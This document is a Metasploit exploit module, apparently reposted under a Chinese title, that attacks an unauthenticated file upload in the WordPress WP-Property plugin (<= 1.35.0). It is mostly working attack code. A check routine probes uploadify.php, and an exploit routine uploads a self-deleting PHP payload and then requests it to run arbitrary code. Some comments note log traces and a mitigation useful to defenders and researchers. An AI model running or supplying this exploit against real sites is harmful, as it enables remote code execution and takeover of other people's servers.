WordPress WP-Property PHP 文件上传漏洞

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0 according to the module description).
#
# The plugin ships a third-party uploadify.php handler that accepts a
# multipart upload without any authentication and stores the file under a
# web-reachable directory. All traffic produced by this module goes to
#   <TARGETURI>/wp-content/plugins/wp-property/third-party/uploadify/
# so web-server logs showing a POST to uploadify.php followed by a GET for a
# freshly created .php file in that area are the trace to look for.
# Removing or blocking direct access to that handler closes the entry point;
# the fixed plugin version is not stated here and should be confirmed with
# the vendor.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (references, targets, payload constraints)
  # and the single TARGETURI option that locates the WordPress install.
  #
  # @param info [Hash] metadata supplied by the framework, merged through
  #   update_info
  def initialize(info = {})
    module_info = update_info(
      info,
      'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description' => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
      },
      'Author' => [
        'Sammy FORGIT', # initial discovery
        'James Fitts <fitts.james[at]gmail.com>' # metasploit module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['OSVDB', '82656'],
        ['BID', '53787'],
        ['EDB', '18987'],
        ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html']
      ],
      'Payload' => { 'BadChars' => "\x00" },
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [
        ['Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }],
        ['Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Mar 26 2012'
    )
    super(module_info)

    wordpress_path = OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
    register_options([wordpress_path], self.class)
  end

  # Probes for the bundled upload handler with a plain GET.
  #
  # A 200 response only shows that uploadify.php is reachable; neither the
  # plugin version nor the handler's behaviour is inspected, which is why the
  # strongest result is Appears rather than Vulnerable. Any other outcome
  # (no response, non-200) is reported as Unknown, so a host fronted by a
  # filter that answers differently is not thereby shown to be patched.
  #
  # @return [Exploit::CheckCode::Unknown, Exploit::CheckCode::Appears]
  def check
    base = target_uri.path
    base << '/' unless base.end_with?('/')

    probe = send_request_cgi({
      'method' => 'GET',
      'uri' => "#{base}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Appears if probe && probe.code == 200

    Exploit::CheckCode::Unknown
  end

  # Uploads a PHP stub through uploadify.php and then requests it.
  #
  # Wire-level shape, as built below: one multipart/form-data POST with a
  # "Filedata" part (application/octet-stream, five random letters + ".php"
  # as filename) and a "folder" part naming the uploadify directory, then one
  # GET for whatever path the handler returned. The stub is generated with
  # unlink_self, so the uploaded file is presumably gone from disk after it
  # runs -- access logs, not the filesystem, are the durable record.
  #
  # Fails with Failure::UnexpectedReply unless the POST returns 200 and the
  # body mentions the uploaded file name.
  def exploit
    base = target_uri.path
    base << '/' unless base.end_with?('/')
    plugin_dir = "#{base}wp-content/plugins/wp-property/third-party/uploadify/"

    endpoint = "#{rhost}:#{rport}"
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(unlink_self: true)

    form = Rex::MIME::Message.new
    form.add_part(
      php_payload,
      'application/octet-stream',
      nil,
      %(form-data; name="Filedata"; filename="#{@payload_name}")
    )
    form.add_part(plugin_dir, nil, nil, %(form-data; name="folder"))
    # Drops the blank line the MIME serializer emits ahead of a boundary.
    post_data = form.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{endpoint} - Uploading payload #{@payload_name}")
    upload_res = send_request_cgi({
      'method' => 'POST',
      'uri' => "#{plugin_dir}uploadify.php",
      'ctype' => "multipart/form-data; boundary=#{form.bound}",
      'data' => post_data
    })

    accepted = upload_res && upload_res.code == 200 && upload_res.body =~ /#{@payload_name}/
    fail_with(Exploit::Failure::UnexpectedReply, "#{endpoint} - Upload failed") unless accepted

    # The handler's response body is used verbatim as the path of the
    # follow-up request; nothing here validates or normalises it.
    stored_at = upload_res.body

    print_status("#{endpoint} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri' => stored_at,
      'method' => 'GET'
    })
  end
end
不要问我这写的是什么 怎么利用 我是说msf.